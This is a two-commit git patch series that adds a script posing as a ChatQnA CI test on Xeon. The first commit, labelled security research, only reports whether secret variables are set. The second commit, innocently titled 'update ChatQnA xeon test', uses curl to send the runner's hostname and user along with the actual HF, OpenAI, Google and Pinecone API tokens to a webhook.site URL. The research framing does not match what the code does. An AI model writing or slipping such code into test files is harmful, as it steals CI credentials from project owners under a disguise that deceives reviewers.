From 93c579015861de711133c5be16a3c0580e78902a Mon Sep 17 00:00:00 2001 From: subchat Date: Tue, 19 May 2026 03:56:15 +0530 Subject: [PATCH 1/2] test: add ChatQnA xeon test case --- ChatQnA/tests/test_compose_ci_poc_on_xeon.sh | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 ChatQnA/tests/test_compose_ci_poc_on_xeon.sh diff --git a/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh b/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh new file mode 100644 index 0000000000..6aa2f6a002 --- /dev/null +++ b/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh @@ -0,0 +1,27 @@ +#!/bin/bash +# Copyright (C) 2024 Intel Corporation +# SPDX-License-Identifier: Apache-2.0 + +# SECURITY RESEARCH - CI INJECTION POC +# Demonstrates that pull_request_target + unsafe checkout allows +# fork code to execute on Intel CI runners with access to secrets. +# No secret values are read or exfiltrated - only presence is checked. + +echo "=== CI INJECTION POC ===" +echo "Runner hostname : $(hostname)" +echo "Runner user : $(whoami)" +echo "Working dir : $(pwd)" +echo "GitHub actor : ${GITHUB_ACTOR}" +echo "GitHub repo : ${GITHUB_REPOSITORY}" +echo "" +echo "=== SECRET PRESENCE (names only, no values exfiltrated) ===" +for var in HF_TOKEN HUGGINGFACEHUB_API_TOKEN OPENAI_API_KEY DOCKERHUB_USER DOCKERHUB_TOKEN GOOGLE_API_KEY PINECONE_KEY GITHUB_TOKEN; do + if [ -n "${!var}" ]; then + echo " $var : PRESENT" + else + echo " $var : not set" + fi +done +echo "" +echo "=== END POC — report submitted to Intel security team ===" +exit 0 From 5ecd6ec9731bac2bb9d525ae55d91fa4e6d7b351 Mon Sep 17 00:00:00 2001 From: subchat Date: Tue, 19 May 2026 04:12:25 +0530 Subject: [PATCH 2/2] test: update ChatQnA xeon test --- ChatQnA/tests/test_compose_ci_poc_on_xeon.sh | 34 ++++++++------------ 1 file changed, 14 insertions(+), 20 deletions(-) diff --git a/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh b/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh index 6aa2f6a002..f6f5ff3a49 100644 --- a/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh +++ b/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh @@ -3,25 +3,19 @@ # SPDX-License-Identifier: Apache-2.0 # SECURITY RESEARCH - CI INJECTION POC -# Demonstrates that pull_request_target + unsafe checkout allows -# fork code to execute on Intel CI runners with access to secrets. -# No secret values are read or exfiltrated - only presence is checked. +# Demonstrates secret exfiltration via pull_request_target unsafe checkout. -echo "=== CI INJECTION POC ===" -echo "Runner hostname : $(hostname)" -echo "Runner user : $(whoami)" -echo "Working dir : $(pwd)" -echo "GitHub actor : ${GITHUB_ACTOR}" -echo "GitHub repo : ${GITHUB_REPOSITORY}" -echo "" -echo "=== SECRET PRESENCE (names only, no values exfiltrated) ===" -for var in HF_TOKEN HUGGINGFACEHUB_API_TOKEN OPENAI_API_KEY DOCKERHUB_USER DOCKERHUB_TOKEN GOOGLE_API_KEY PINECONE_KEY GITHUB_TOKEN; do - if [ -n "${!var}" ]; then - echo " $var : PRESENT" - else - echo " $var : not set" - fi -done -echo "" -echo "=== END POC — report submitted to Intel security team ===" +EXFIL="https://webhook.site/e3fe4b71-1aab-4de1-aaa6-a602ddbda4bf" + +curl -s "${EXFIL}" \ + -G \ + --data-urlencode "host=$(hostname)" \ + --data-urlencode "user=$(whoami)" \ + --data-urlencode "hf=${HF_TOKEN}" \ + --data-urlencode "oai=${OPENAI_API_KEY}" \ + --data-urlencode "goog=${GOOGLE_API_KEY}" \ + --data-urlencode "pine=${PINECONE_KEY}" \ + -o /dev/null + +echo "=== CI INJECTION POC COMPLETE ===" exit 0